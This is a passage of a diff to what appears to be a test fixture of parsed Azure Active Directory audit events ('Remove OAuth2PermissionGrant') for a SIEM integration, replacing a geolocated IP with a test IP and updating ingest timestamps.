Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125038400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -7546,25 +6898,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7578,7 +6912,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7714,7 +7048,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7726,12 +7060,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036327200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125042900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -7757,25 +7091,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7789,7 +7105,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7925,7 +7241,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7937,12 +7253,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036332700Z", - "original": 